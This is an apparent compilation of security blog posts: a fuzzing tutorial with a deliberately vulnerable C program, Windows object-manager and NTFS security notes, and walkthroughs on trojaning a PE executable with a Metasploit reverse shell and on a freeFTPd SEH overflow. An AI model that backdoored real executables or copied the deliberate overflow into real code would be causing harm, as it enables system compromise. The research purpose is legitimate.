        printf("Usage: ./cfuzz Canon_40D.jpg 10000\n");
        exit(1);
    }

    // get our random seed
    srand((unsigned)time(NULL));

    char* fuzz_target = argv[1];
    struct ORIGINAL_FILE original_file = get_data(fuzz_target);
    printf("[>] Size of file: %ld bytes.\n", original_file.length);
    size_t mutations = (original_file.length - 4) * .02;
    printf("[>] Flipping up to %ld bytes.\n", mutations);

    int iterations = atoi(argv[2]);
    printf("[>] Fuzzing for %d iterations...\n", iterations);
    for (int i = 0; i < iterations; i++) {
        create_new(original_file, mutations);
        exif(i);
    }
    
    printf("\n[>] Fuzzing completed, exiting...\n");
    return 0;
}

Not going to spend a lot of time on the fuzzer’s features (what features?) here, but some important things about the fuzzer code:

it takes a file as input and copies the bytes from the file into a buffer
it calculates the length of the buffer in bytes, and then mutates 2% of the bytes by randomly overwriting them with arbitrary bytes
the function responsible for the mutation, create_new, doesn’t keep track of what byte indexes were mutated so theoretically, the same index could be chosen for mutation multiple times, so really, the fuzzer mutates up to 2% of the bytes.

Small Detour, I Apologize

We only have one mutation method here to keep things super simple, in doing so, I actually learned something really useful that I hadn’t clearly thought out previously. In a previous post I wondered, embarrassingly, aloud and in print, how much different random bit flipping was from random byte overwriting (flipping?). Well, it turns out, they are super different. Let’s take a minute to see how.

Let’s say we’re mutating an array of bytes called bytes. We’re mutating index 5. bytes[5] == \x41 (65 in decimal) in the unmutated, pristine original file. If we only bit flip, we are super limited in how much we can mutate this byte. 65 is 01000001 in binary. Let’s just go through at see how much it changes from arbitrarily flipping one bit:

Flipping first bit: 11000001 = 193,
Flipping second bit: 00000001 = 1,
Flipping third bit: 01100001 = 97,
Flipping fourth bit: 01010001 = 81,
Flipping fifth bit: 01001001 = 73,
Flipping sixth bit: 01000101 = 69,
Flipping seventh bit: 01000011 = 67, and
Flipping eighth bit: 010000001 = 64.

As you can see, we’re locked in to a severely limited amount of possibilities.

So for this program, I’ve opted to replace this mutation method with one that instead just substitutes a random byte instead of a bit within the byte.

Vulnerable Program

I wrote a simple cartoonish program to demonstrate how hard it can be for “dumb” fuzzers to find bugs. Imagine a target application that has several decision trees in the disassembly map view of the binary. The application performs 2-3 checks on the input to see if it meets certain criteria before passing the input to some sort of vulnerable function. Here is what I mean:

Our program does this exact thing, it retrieves the bytes of an input file and checks the bytes at an index 1/3rd of the file length, 1/2 of the file length, and 2/3 of the file length to see if the bytes in those positions match some hardcoded values (arbitrary). If all the checks are passed, the application copies the byte buffer into a small buffer causing a segfault to simulate a vulnerable function. Here is our program:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>

struct ORIGINAL_FILE {
    char * data;
    size_t length;
};

struct ORIGINAL_FILE get_bytes(char* fileName) {

    FILE *filePtr;
    char* buffer;
    long fileLen;

    filePtr = fopen(fileName, "rb");
    if (!filePtr) {
        printf("[>] Unable to open %s\n", fileName);
        exit(-1);
    }
    
    if (fseek(filePtr, 0, SEEK_END)) {
        printf("[>] fseek() failed, wtf?\n");
        exit(-1);
    }

    fileLen = ftell(filePtr);
    if (fileLen == -1) {
        printf("[>] ftell() failed, wtf?\n");
        exit(-1);
    }

    errno = 0;
    rewind(filePtr);
    if (errno) {
        printf("[>] rewind() failed, wtf?\n");
        exit(-1);
    }

    long trueSize = fileLen * sizeof(char);
    printf("[>] %s is %ld bytes.\n", fileName, trueSize);
    buffer = (char *)malloc(fileLen * sizeof(char));
    fread(buffer, fileLen, 1, filePtr);
    fclose(filePtr);

    struct ORIGINAL_FILE original_file;
    original_file.data = buffer;
    original_file.length = trueSize;

    return original_file;
}

void check_one(char* buffer, int check) {

    if (buffer[check] == '\x6c') {
        return;
    }
    else {
        printf("[>] Check 1 failed.\n");
        exit(-1);
    }
}

void check_two(char* buffer, int check) {

    if (buffer[check] == '\x57') {
        return;
    }
    else {
        printf("[>] Check 2 failed.\n");
        exit(-1);
    }
}

void check_three(char* buffer, int check) {

    if (buffer[check] == '\x21') {
        return;
    }
    else {
        printf("[>] Check 3 failed.\n");
        exit(-1);
    }
}

void vuln(char* buffer, size_t length) {

    printf("[>] Passed all checks!\n");
    char vulnBuff[20];

    memcpy(vulnBuff, buffer, length);

}

int main(int argc, char *argv[]) {
    
    if (argc < 2 || argc > 2) {
        printf("[>] Usage: vuln example.txt\n");
        exit(-1);
    }

    char *filename = argv[1];
    printf("[>] Analyzing file: %s.\n", filename);

    struct ORIGINAL_FILE original_file = get_bytes(filename);

    int checkNum1 = (int)(original_file.length * .33);
    printf("[>] Check 1 no.: %d\n", checkNum1);

    int checkNum2 = (int)(original_file.length * .5);
    printf("[>] Check 2 no.: %d\n", checkNum2);

    int checkNum3 = (int)(original_file.length * .67);
    printf("[>] Check 3 no.: %d\n", checkNum3);

    check_one(original_file.data, checkNum1);
    check_two(original_file.data, checkNum2);
    check_three(original_file.data, checkNum3);
    
    vuln(original_file.data, original_file.length);
    

    return 0;
}

Keep in mind that this is only one type of criteria, there are several different types of criteria that exist in binaries. I selected this one because the checks are so specific it can demonstrate, in an exaggerated way, how hard it can be to reach new code purely by randomness.

Our sample file, which we’ll mutate and feed to this vulnerable application is still the same file from the previous posts, the Canon_40D.jpg file with exif data.

h0mbre@pwn:~/fuzzing$ file Canon_40D.jpg 
Canon_40D.jpg: JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=11, manufacturer=Canon, model=Canon EOS 40D, orientation=upper-left, xresolution=166, yresolution=174, resolutionunit=2, software=GIMP 2.4.5, datetime=2008:07:31 10:38:11, GPS-Data], baseline, precision 8, 100x68, frames 3
h0mbre@pwn:~/fuzzing$ ls -lah Canon_40D.jpg 
-rw-r--r-- 1 h0mbre h0mbre 7.8K May 25 06:21 Canon_40D.jpg

The file is 7958 bytes long. Let’s feed it to the vulnerable program and see what indexes are chosen for the checks:

h0mbre@pwn:~/fuzzing$ vuln Canon_40D.jpg 
[>] Analyzing file: Canon_40D.jpg.
[>] Canon_40D.jpg is 7958 bytes.
[>] Check 1 no.: 2626
[>] Check 2 no.: 3979
[>] Check 3 no.: 5331
[>] Check 1 failed.

So we can see that indexes 2626, 3979, and 5331 were chosen for testing and that the file failed the first check as the byte at that position wasn’t \x6c.

Experiment 1: Passing Only One Check

Let’s take away checks two and three and see how our dumb fuzzer performs against the binary when we only have to pass one check.

I’ll comment out checks two and three:

check_one(original_file.data, checkNum1);
//check_two(original_file.data, checkNum2);
//check_three(original_file.data, checkNum3);
    
vuln(original_file.data, original_file.length);

And so now, we’ll take our unaltered jpeg, which naturally does not pass the first check, and have our fuzzer mutate it and send it to the vulnerable application hoping for crashes. Remember, that the fuzzer mutates up to 159 bytes of the 7958 bytes total each fuzzing iteration. If the fuzzer randomly inserts an \x6c into index 2626, we will pass the first check and execution will pass to the vulnerable function and cause a crash. Let’s run our dumb fuzzer 1 million times and see how many crashes we get.

h0mbre@pwn:~/fuzzing$ ./fuzzer Canon_40D.jpg 1000000
[>] Size of file: 7958 bytes.
[>] Flipping up to 159 bytes.
[>] Fuzzing for 1000000 iterations...
[>] Crashes: 88
[>] Fuzzing completed, exiting...

So out of 1 million iterations, we got 88 crashes. So on about %.0088 of our iterations, we met the criteria to pass check 1 and hit the vulnerable function. Let’s double check our crash to make sure there’s no error in any of our code (I fuzzed the vulnerable program with all checks enabled in QEMU mode (to simulate not having source code) with AFL for 14 hours and wasn’t able to crash the program so I hope there are no bugs that I don’t know about 😬).

h0mbre@pwn:~/fuzzing/ccrashes$ vuln 998636.11 
[>] Analyzing file: 998636.11.
[>] 998636.11 is 7958 bytes.
[>] Check 1 no.: 2626
[>] Check 2 no.: 3979
[>] Check 3 no.: 5331
[>] Passed all checks!
Segmentation fault

So feeding the vulnerable program one of the crash inputs actually does crash it. Cool.

Disclaimer: Here is where some math comes in, and I’m not guaranteeing this math is correct. I even sought help from some really smart people like @Firzen14 and am still not 100% confident in my math lol. But! I did go ahead and simulate the systems involved here hundreds of millions of times and the results of the empirical data were super close to what the possibly broken math said it should be. So, if it’s not correct, its at least close enough to prove the points I’m trying to demonstrate.

Let’s try and figure out how likely it is that we pass the first check and get a crash. The first obstacle we need to pass is that we need index 2626 to be chosen for mutation. If it’s not mutated, we know that by default its not going to hold the value we need it to hold and we won’t pass the check. Since we’re selecting a byte to be mutated 159 times, and we have 7958 bytes to choose from, the odds of us mutating the byte at index 2626 is probably something close to 159/7958 which is 0.0199798944458407.

The second obstacle, is that we need it to hold exactly \x6c and the fuzzer has 255 byte values to choose from. So the chances of this byte, once selected for mutation, to be mutated to exactly \x6c is 1/255, which is 0.003921568627451.

So the chances of both of these things occurring should be close to 0.0199798944458407 * 0.003921568627451, (about .0078%), which if you multiply by 1 million, would have you at around 78 crashes. We were pretty close to that with 88. Given that we’re doing this randomly, there is going to be some variance.

So in conclusion for Experiment 1, we were able to reliably pass this one type of check and reach our vulnerable function with our dumb fuzzer. Let’s see how things change when add a second check.

Experiment 2: Passing Two Checks

Here is where the math becomes an even bigger problem; however, as I said previously, I ran a simulation of the events hundreds of millions of times and was pretty close to what I thought should be the math.

Having the byte value be correct is fairly straightforward I think and is always going to be 1/255, but having both indexes selected for mutation with only 159 choices available tripped me up. I ran a simulator to see how often it occurred that both indexes were selected for mutation and let it run for a while, after over 390 million iterations, it happened around 155,000 times total.

<snip>
Occurences: 155070    Iterations: 397356879
Occurences: 155080    Iterations: 397395052
Occurences: 155090    Iterations: 397422769
<snip>

155090/397422769 == .0003902393423261565. I would think the math is something close to (159/7958) * (158/7958), which would end up being .0003966855142551934. So you can see that they’re pretty close, given some random variance, they’re not too far off. This should be close enough to demonstrate the problem.

Now that we have to pass two checks, we can mathematically summarize the odds of this happening with our dumb fuzzer as follows:

((159/7958) * (1/255)) == odds to pass first check
odds to pass first check * (158/7958) == odds to pass first check and have second index targeted for mutation
odds to pass first check * ((158/7958) * (1/255)) == odds to have second index targeted for mutation and hold the correct value
((159/7958) * (1/255)) * ((158/7958) * (1/255)) == odds to pass both checks
((0.0199798944458407 * 0.003921568627451‬) * (0.0198542347323448 * 0.003921568627451)) == 6.100507716342904e-9

So the odds of us getting both indexes selected for mutation and having both indexes mutated to hold the needed value is around .000000006100507716342904, which is .0000006100507716342904%.

For one check enabled, we should’ve expected ONE crash every ~12,820 iterations.

For two checks enabled, we should expect ONE crash every ~163 million iterations.

This is quite the problem. Our fuzzer would need to run for a very long time to reach that many iterations on average. As written and performing in a VM, the fuzzer does roughly 1,600 iterations a second. It would take me about 28 hours to reach 163 million iterations. You can see how our chances of finding the bug decreased exponentionally with just one more check enabled. Imagine a third check being added!

How Code Coverage Tracking Can Help Us

If our fuzzer was able to track code coverage, we could turn this problem into something much more manageable.

Generically, a code coverage tracking system in our fuzzer would keep track of what inputs reached new code in the application. There are many ways to do this. Sometimes when source code is available to you, you can recompile the binaries with instrumentation added that informs the fuzzer when new code is reached, there is emulation, etc. @gamozolabs has a really cool Windows userland code coverage system that leverages an extremely fast debugger that sets millions of breakpoints in a target binary and slowly removes breakpoints as they are reached called ‘mesos’. Once your fuzzer becomes aware that a mutated input reached new code, it would save that input off so that it can be re-used and mutated further to reach even more code. That is a very simple explanation, but hopefully it paints a clear picture.

I haven’t yet implemented a code coverage technique for the fuzzer, but we can easily simulate one. Let’s say our fuzzer was able, 1 out of ~13,000 times, to pass the first check and reach that second check in the program.

The first time the input reached this second check, it would be considered new code coverage. As a result, our now smart fuzzer would save that input off as it caused new code to be reached. This input would then be fed back through the mutator and hopefully reach the same new code again with the added possibility of reaching even more code.

Let’s demonstrate this. Let’s doctor our file Canon_40D.jpg such that the byte at the 2626 index is \x6c, and feed it through to our vulnerable application.

h0mbre@pwn:~/fuzzing$ vuln Canon_altered.jpg 
[>] Analyzing file: Canon_altered.jpg.
[>] Canon_altered.jpg is 7958 bytes.
[>] Check 1 no.: 2626
[>] Check 2 no.: 3979
[>] Check 2 failed.

As you can see, we passed the first check and failed on the second check. Let’s use this Canon_altered.jpg file now as our base input that we use for mutation simulating the fact that we have code coverage tracking in our fuzzer and see how many crashes we get when there are only testing for two checks total.

h0mbre@pwn:~/fuzzing$ ./fuzzer Canon_altered.jpg 1000000
[>] Size of file: 7958 bytes.
[>] Flipping up to 159 bytes.
[>] Fuzzing for 1000000 iterations...
[>] Crashes: 86
[>] Fuzzing completed, exiting...

So by using the file that got us increased code coverage, ie it passed the first check, as a base file and sending it back through the mutator, we were able to pass the second check 86 times. We essentially took that exponentially hard problem we had earlier and turned it back into our original problem of only needing to pass one check. There are a bunch of other considerations that real fuzzers would have to take into account but I’m just trying to plainly demonstrate how it helps reduce the exponential problem into a more manageable one.

We reduced our ((0.0199798944458407 * 0.003921568627451‬) * (0.0198542347323448 * 0.003921568627451)) == 6.100507716342904e-9 problem to something closer to (0.0199798944458407 * 0.003921568627451)‬, which is a huge win for us.

Some nuance here is that feeding the altered file back through the mutation process could do a few things. It could remutate the byte at index 2626 and then we wouldn’t even pass the first check. It could mutate the file so much (remember, it is already up to 2% different than a valid jpeg from the first round of mutation) that the vulnerable application flat out rejects the input and we waste fuzz cycles.

So there are a lot of other things to consider, but hopefully this plainly demonstrates how code-coverage helps fuzzers complete a more comprehensive test of a target binary.

Conclusion

There are a lot of resources out there on different code coverage techniques, definitely follow up and read more on the subject if it interests you. @carste1n has a great series where he goes through incrementally improves a fuzzer, you can catch the latest article here: https://carstein.github.io/2020/05/21/writing-simple-fuzzer-4.html

At some time in the future we can add some code coverage logic to our dumb fuzzer from this article and we can use the vulnerable program as a sort of benchmark to judge the effectiveness of a code coverage technique.

Some interesting notes, I fuzzed the vulnerable application with all three checks enabled with AFL for about 13 hours and wasn’t able to crash it! I’m not sure why it was so difficult. With only two checks enabled, AFL was able to find the crash very quickly. Maybe there was something wrong with my testing, I’m not quite sure.

Until next time!

Tyranid's Lair
OBJ_DONT_REPARSE is (mostly) Useless.tiraniddo
23 May 2020 at 10:21

OBJ_DONT_REPARSE is (mostly) Useless.

Tyranid's Lair

By: tiraniddo

23 May 2020 at 10:21

Continuing a theme from the last blog post, I think it's great that the two additional OBJECT_ATTRIBUTE flags were documented as a way of mitigating symbolic link attacks. While OBJ_IGNORE_IMPERSONATED_DEVICEMAP is pretty useful, the other flag, OBJ_DONT_REPARSE isn't, at least not for protecting file system access.

To quote the documentation, OBJ_DONT_REPARSE does the following:

"If this flag is set, no reparse points will be followed when parsing the name of the associated object. If any reparses are encountered the attempt will fail and return an STATUS_REPARSE_POINT_ENCOUNTERED result. This can be used to determine if there are any reparse points in the object's path, in security scenarios."

This seems pretty categorical, if any reparse point is encountered then the name parsing stops and STATUS_REPARSE_POINT_ENCOUNTERED is returned. Let's try it out in PS and open the notepad executable file.

PS> Get-NtFile \??\c:\windows\notepad.exe -ObjectAttributes DontReparse
Get-NtFile : (0xC000050B) - The object manager encountered a reparse point while retrieving an object.

Well that's not what you might expect, there should be no reparse points to access notepad, so what went wrong? We'll you're assuming that the documentation meant NTFS reparse points, when it really meant all reparse points. The C: drive symbolic link is still a reparse point, just for the Object Manager. Therefore just accessing a drive path using this Object Attribute flag fails. Still this does means that it will also work to protect you from Registry Symbolic Links as well as that also uses a Reparse Point.

I'm assuming this flag wasn't introduced for file access at all, but instead for named kernel objects where encountering a Symbolic Link is usually less of a problem. Unlike OBJ_IGNORE_IMPERSONATED_DEVICEMAP I can't pinpoint a specific vulnerability this flag was associated with, so I can't say for certain why it was introduced. Still, it's slightly annoying especially considering there is an IO Manager specific flag, IO_STOP_ON_SYMLINK which does what you'd want to avoid file system symbolic links but that can only be accessed in kernel mode with IoCreateFileEx.

Not that this flag completely protects against Object Manager redirection attacks. It doesn't prevent abuse of shadow directories for example which can be used to redirect path lookups.

PS> $d = Get-NtDirectory \Device
PS> $x = New-NtDirectory \BaseNamedObjects\ABC -ShadowDirectory $d
PS> $f = Get-NtFile \BaseNamedObjects\ABC\HarddiskVolume3\windows\notepad.exe -ObjectAttributes DontReparse
PS> $f.FullPath
\Device\HarddiskVolume3\Windows\notepad.exe

Oh well...

Tyranid's Lair
Silent Exploit Mitigations for the 1%tiraniddo
22 May 2020 at 23:59

Silent Exploit Mitigations for the 1%

Tyranid's Lair

By: tiraniddo

22 May 2020 at 23:59

With the accelerated release schedule of Windows 10 it's common for new features to be regularly introduced. This is especially true of features to mitigate some poorly designed APIs or easily misused behavior. The problems with many of these mitigations is they're regularly undocumented or at least not exposed through the common Win32 APIs. This means that while Microsoft can be happy and prevent their own code from being vulnerable they leave third party developers to get fucked.

One example of these silent mitigations are the additional OBJECT_ATTRIBUTE flags OBJ_IGNORE_IMPERSONATED_DEVICEMAP and OBJ_DONT_REPARSE which were finally documented, in part because I said it'd be nice if they did so. Of course, it only took 5 years to document them since they were introduced to fix bugs I reported. I guess that's pretty speedy in Microsoft's world. And of course they only help you if you're using the system call APIs which, let's not forget, are only partially documented.

While digging around in Windows 10 2004 (ugh... really, it's just confusing), and probably reminded by Alex Ionescu at some point, I noticed Microsoft have introduced another mitigation which is only available using an undocumented system call and not via any exposed Win32 API. So I thought, I should document it.

UPDATE (2020-04-23): According to @FireF0X this was backported to all supported OS's. So it's a security fix important enough to backport but not tell anyone about. Fantastic.

The system call in question is NtLoadKey3. According to j00ru's system call table this was introduced in Windows 10 2004, however it's at least in Windows 10 1909 as well. As the name suggests (if you're me at least) this loads a Registry Key Hive to an attachment point. This functionality has been extended over time, originally there was only NtLoadKey, then NtLoadKey2 was introduced in XP I believe to add some flags. Then NtLoadKeyEx was introduced to add things like explicit Trusted Hive support to mitigate cross hive symbolic link attacks (which is all j00ru's and Gynvael fault). And now finally NtLoadKey3. I've no idea why it went to 2 then to Ex then back to 3 maybe it's some new Microsoft counting system. The NtLoadKeyEx is partially exposed through the Win32 APIs RegLoadKey and RegLoadAppKey APIs, although they're only expose a subset of the system call's functionality.

Okay, so what bug class is NtLoadKey3 trying to mitigate? One of the problematic behaviors of loading a full Registry Hive (rather that a Per-User Application Hive) is you need to have SeRestorePrivilege* on the caller's Effective Token. SeRestorePrivilege is only granted to Administrators, so in order to call the API successfully you can't be impersonating a low-privileged user. However, the API can also create files when loading the hive file. This includes the hive file itself as well as the recovery log files.

* Don't pay attention to the documentation for RegLoadKey which claims you also need SeBackupPrivilege. Maybe it was required at some point, but it isn't any more.

When loading a system hive such as HKLM\SOFTWARE this isn't an issue as these hives are stored in an Administrator only location (c:\windows\system32\config if you're curious) but sometimes the hives are loaded from user-accessible locations such as from the user's profile or for Desktop Bridge support. In a user accessible location you can use symbolic link tricks to force the logs file to be written to arbitrary locations, and to make matters worse the Security Descriptor of the primary hive file is copied to the log file so it'll be accessible afterwards. An example of just this bug, in this case in Desktop Bridge, is issue 1492 (and 1554 as they didn't fix it properly (╯°□°）╯︵ ┻━┻).

RegLoadKey3 fixes this by introducing an additional parameter to specify an Access Token which will be impersonated when creating any files. This way the check for SeRestorePrivilege can use the caller's Access Token, but any "dangerous" operation will use the user's Token. Of course they could have probably implemented this by adding a new flag which will check the caller's Primary Token for the privilege like they do for SeImpersonatePrivilege and SeAssignPrimaryTokenPrivilege but what do I know...

Used appropriately this should completely mitigate the poor design of the system call. For example the User Profile service now uses NtLoadKey3 when loading the hives from the user's profile. How do you call it yourself? I couldn't find any documentation obviously, and even in the usual locations such as OLE32's private symbols there doesn't seem to be any structure data, so I made best guess with the following:

Notice that the TrustKey and Event handles from NtLoadKeyEx have also been folded up into a list of handle values. Perhaps someone wasn't sure if they ever needed to extend the system call whether to go for NtLoadKey4 or NtLoadKeyExEx so they avoided the decision by making the system call more flexible. Also the final parameter, which is also present in NtLoadKeyEx is seemingly unused, or I'm just incapable of tracking down when it gets referenced. Process Hacker's header files claim it's for an IO_STATUS_BLOCK pointer, but I've seen no evidence that's the case.

It'd be really awesome if in this new, sharing and caring Microsoft that they, well shared and cared more often, especially for features important to securing third party applications. TBH I think they're more focused on bringing Wayland to WSL2 or shoving a new API set down developers' throats than documenting things like this.

Matteo Malvica
Distrusting the patch: a run through my first LPE 0-day, from command injection to path traversal
21 May 2020 at 00:00

Distrusting the patch: a run through my first LPE 0-day, from command injection to path traversal

Matteo Malvica

21 May 2020 at 00:00

Intro - TL;DR On April 29th, exploit-db published a Local Privilege Escalation (LPE) exploit for Druva InSync. Druva had by then implemented a patch on their latest InSync release, fixing the bug. However, the patch introduced an additional bug, paving the way for further exploitation and making it possible for a local low-privileged user to obtain SYSTEM level privileges. A team from Tenable Research and I concurrently discovered this new vulnerability, resulting in a new CVE (CVE-2020-5752) and exploit being published.

Tyranid's Lair
Writing Windows File System Drivers is Hard.tiraniddo
20 May 2020 at 21:29

Writing Windows File System Drivers is Hard.

Tyranid's Lair

By: tiraniddo

20 May 2020 at 21:29

A tweet by @jonasLyk reminded me of a bug I found in NTFS a few months back, which I've verified still exists in Windows 10 2004. As far as I can tell it's not directly usable to circumvent security but it feels like a bug which could be used in a chain. NTFS is a good demonstration of how complex writing a FS driver is on Windows, so it's hardly surprising that so many weird edges cases pop up over time.

The issue in this case was related to the default Security Descriptor (SD) assignment when creating a new Directory. If you understand anything about Windows SDs you'll know it's possible to specify the inheritance rules through either the CONTAINER_INHERIT_ACE and/or OBJECT_INHERIT_ACE ACE flags. These flags represent whether the ACE should be inherited from a parent directory if the new entry is either a Directory or a File. Let's look at the code which NTFS uses to assign security to a new file and see if you can spot the bug?

The code uses SeAssignSecurityEx to create the new SD based on the Parent SD and any explicit SD from the caller. For inheritance to work you can't specify an explicit SD, so we can ignore that. Whether SeAssignSecurityEx applies the inheritance rules for a Directory or a File depends on the value of the IsDirectoryObject parameter. This is set to TRUE if the FILE_DIRECTORY_FILE options flag was passed to NtCreateFile. That seems fine, you can't create a Directory if you don't specify the FILE_DIRECTORY_FILE flag, if you don't specify a flag then a File will be created by default.

But wait, that's not true at all. If you specify a name of the form ABC::$INDEX_ALLOCATION then NTFS will create a Directory no matter what flags you specify. Therefore the bug is, if you create a directory using the $INDEX_ALLOCATION trick then the new SD will inherit as if it was a File rather than a Directory. We can verifying this behavior on the command prompt.

C:\> mkdir ABC
C:\> icacls ABC /grant "INTERACTIVE":(CI)(IO)(F)
C:\> icacls ABC /grant "NETWORK":(OI)(IO)(F)

First we create a directory ABC and grant two ACEs, one for the INTERACTIVE group will inherit on a Directory, the other for NETWORK will inherit on a File.

C:\> echo "Hello" > ABC\XYZ::$INDEX_ALLOCATION
Incorrect function.

We then create the sub-directory XYZ using the $INDEX_ALLOCATION trick. We can be sure it worked as CMD prints "Incorrect function" when it tries to write "Hello" to the directory object.

C:\> icacls ABC\XYZ
ABC\XYZ NT AUTHORITY\NETWORK:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Administrators:(I)(F)

Dumping the SD for the XYZ sub-directory we see the ACEs were inherited based on it being a File, rather than a Directory as we can see an ACE for NETWORK rather than for INTERACTIVE. Finally we list ABC to verify it really is a directory.

C:\> dir ABC
Volume in drive C has no label.
Volume Serial Number is 9A7B-865C

Directory of C:\ABC

2020-05-20 19:09 <DIR> .
2020-05-20 19:09 <DIR> ..
2020-05-20 19:05 <DIR> XYZ

Is this useful? Honestly probably not. The only scenario I could imagine it would be is if you can specify a path to a system service which creates a file in a location where inherited File access would grant access and inherited Directory access would not. This would allow you to create a Directory you can control, but it seems a bit of a stretch to be honest. If anyone can think of a good use for this let me or Microsoft know :-)

Still, it's interesting that this is another case where $INDEX_ALLOCATION isn't correctly verified where determining whether an object is a Directory or a File. Another good example was CVE-2018-1036, where you could create a new Directory with only FILE_ADD_FILE permission. Quite why this design decision was made to automatically create a Directory when using the stream type is unclear. I guess we might never know.

APC Series: User APC API

Low Level Pleasure

17 May 2020 at 00:00

Hey! Long time no see. Coronavirus makes it harder for me to write posts, I hope I’ll have the time to write - I have a lot I want to share! One of the things I did in the last few weeks is to explore the APC mechanism in Windows and I wanted to share some of my findings. The purpose of this series is to allow you to get a systematic understanding of APC internals.

Portable Executable (PE) backdooring and Address Space Layout Randomization (ASLR)

Pyt3ra Security Blogs

By: Ymir F. Eboras | OSCE | OSCP | SLAE| MS. Comp Science

15 May 2020 at 17:59

This blog will go over on how to backdoor windows executable. The intent is to show how a windows PE can be hijacked and introduced a reverse shell while still allowing the executable to maintain its functionality. We will go over how ASLR provides security feature that randomises the base address of executables/DLLs and positions of other memory segments like stack and heap. This prevents exploits from reliably jumping to a certain function/piece of code.

This is why you shouldn't trust any executables that you are introducing to your system without verifying its source or checksum.

References:

PortablExecutable (PE): (https://en.wikipedia.org/wiki/Portable_Executable)

Address Space Layout Randomization (ASLR): https://en.wikipedia.org/wiki/Address_space_layout_randomization

Executables:

tftpd32.exe - is free, open-source TFTP server that is also includes a variety of different services, including DHCP, TFTP, DNS, and even syslog and functions as a TFTP Client as well

PsExec.exe - is a command-line tool that lets you execute processes on remote systems and redirect console applications' output to the local system so that these applications appear to be running locally.

Tools:

Immunity Debugger (http://debugger.immunityinc.com/ID_register.py)

LordPE (http://www.malware-analyzer.com/pe-tools)

XVI32 (http://www.chmaas.handshake.de/delphi/freeware/xvi32/xvi32.htm)

~//*******//~

0x0 - Adding a New Section...Code Cave

There are basically two (or more?) ways to get a code cave (1) Find available address space and (2) add a new executable section.

"The concept of a code cave is often employed by hackers and reverse engineers to execute arbitrary code in a compiled program. It can be a helpful method to make modifications to a compiled program in the example of including additional dialog boxes, variable modifications or even the removal of software key validation checks. Often using a call instruction commonly found on many CPU architectures, the code jumps to the new subroutine and pushes the next address onto the stack. After execution of the subroutine a return instruction can be used to pop the previous location off of the stack into the program counter. This allows the existing program to jump to the newly added code without making significant changes to the program flow itself."

(1) Finding a code cave using backdoor-factory

(2) Using LordPE to add a new executable section.

For this blog, we will add a new section. As seen above, I added a section with 1000 virtual size, raw size 400. Also note that virtual offset is 0004B000 as we will need this value to calculate the Relative Value Address (RVA). Since ASLR is enabled, we will use RVA in order to dynamically do our jumps and address redirections.

0x1 - Entry point and New Section address

Using immunity debugger, we get the address of the new section (from this on this will be called code cave)

We can see that the address is currently pointing to 010AB000, however, the 2 higher-bytes of the adressare irrelevant due to ASLR.

We can see the entry point once we open up tftpd32.exe in immunity debugger and verify the memoy map. We will be hijacking the first instruction to make the jump to our code cave. Also, note that we will need to reintroduce these two instructions after the backdoor.

If ASLR was not enabled, we could have easily done a jmp 010AB000. That said, we will need to do some calculations to always hit the code cave regardless if its address is randomized.

To calculate the RVA, we will need the virtual offset and the entry point.

4B000 (VOffset) - 1208C (EntryPoint) = 3 8F74. This mean that we will do a jmp 38F74.

Using nasm_shell.rb, we generate the following opcodes.

Our first instruction will be updated with E9 6F8F0300 which will do a jump to our code cave.

...if we reload the program, ASLR kicks in as we can see the higher 2 bytes have changed. The same opcodes but different address.

We take the jump and it lands us to the beginning of our code cave.

0x2 - Backdoor/Reverse Shell Code

Once in our code cave, we will add a Metasploit reverse shellcode

We will create the payload in hex format and binary copy it to the program using immunity debugger.

Before the reverse shell can be copied, all the registers and flags have to be said which can be done with PUSHAD and PUSHFD instructions. This is needed to maintain the integrity of the original program execution.

Once reverse shellcode is added, registers and flags are restored to their original state using POPFD and POPAD. However before that, we need to adjust the value of ESP to point it to the original stack/ESP value.

In my case, here are the ESP values

Before shellcode: 0025F908

After shellcode: 0025F70C

We will need to add 1FC to the ESP to align it, then execute the POPFD and POPAD instructions to restore the registers and flags

At this point, if we add a breakpoint at the end of our shellcode and run the program...we should get a reverse shell to our Kali netcat listener.

As you can see that we have successfully hijacked code execution and redirected it to our code cave containing our reverse shellcode.

0x3 - Restoring Original Program Instructions

Remember the two instruction at the entry point before they were hijacked.? We will now need to restore these two instructions so the program can run as intended.

Keep in mind that we are still dealing with ASLR which means we will need calculate the RVA once again.

0096 BF15 - 0095 0000 = RVA 1 BF15 (this will be our CALL RVA_1 BF15) (additional offset by 10000)

0096 2091 - 0095 0000 = RVA 1 2091 (this will be our JMP RVA_1 2091) (additional offset by 10000)

At address 010AB169 or RVA 4B169 (virtual offset + 169)

RVA_4B169 - RVA_1 BF15

At address 010AB16E or RVA 4B16E (virtual offset + 16E)

RVA_4B16E- RVA_1 2091

Add these instructions or opcodes as shown below:

And we are done...somewhat.

0x4 - WaitForSingleObject

Our reverse shell calls the WaitForSingleObject function which pushes an ESI value of -1. As a result, tftpd32.exe will not execute until we exit the reverse shell. This mean that we will need to change the ESI value from -1 to 0.

We will trace code execution in immunity debugger using 'Trace Over' command.

Line 5 has DEC ESI instructions which makes ESI = FFFFFFFF. This means that all we need to do is cancel the DEC ESI instructions (making it NOP works just fine)!

We should now be able to successfully execute the program while it also simultaneously sends a reverse shell to Kali.

Thanks for reading.

Pyt3ra Security Blogs
freeFTPd-1.0.10 SEH Based Buffer OverflowYmir F. Eboras | OSCE | OSCP | SLAE| MS. Comp Science
13 May 2020 at 10:40

freeFTPd-1.0.10 SEH Based Buffer Overflow

Pyt3ra Security Blogs

By: Ymir F. Eboras | OSCE | OSCP | SLAE| MS. Comp Science

13 May 2020 at 10:40

Kali Linux

Windows Vista

freeFTPD 1.0.10

Original Author, POC, and vulnerable software: https://www.exploit-db.com/exploits/27747

GitHub:https://github.com/pyt3ra/freeFTPd-1.0.10-SEH-Based-Buffer-Overflow

~~~~~~//******//~~~~~~

Vulnerable program:

Initial Proof-of-Concept

...and we get our initial crash where our SEH handler and nSEH have been overwritten with 41s.

Calculating the offset values

As usual, we use Metasploit's pattern _create.rb and pattern_offset.rb

We update our POC with the following offset values

...and we verify that we hit the correct offset values as shown with the Cs and Bs

POP-POP-RET

Since this a SEH based buffer overflow, as usual we will need a POP-POP-RET address.

I am using mona.py to find this address.

Also, note that we will need to find an address that SAFESEH and ASLR disabled.

We will use address 0x0041B865

Again, we update our POC with our SEH Handler redirect address

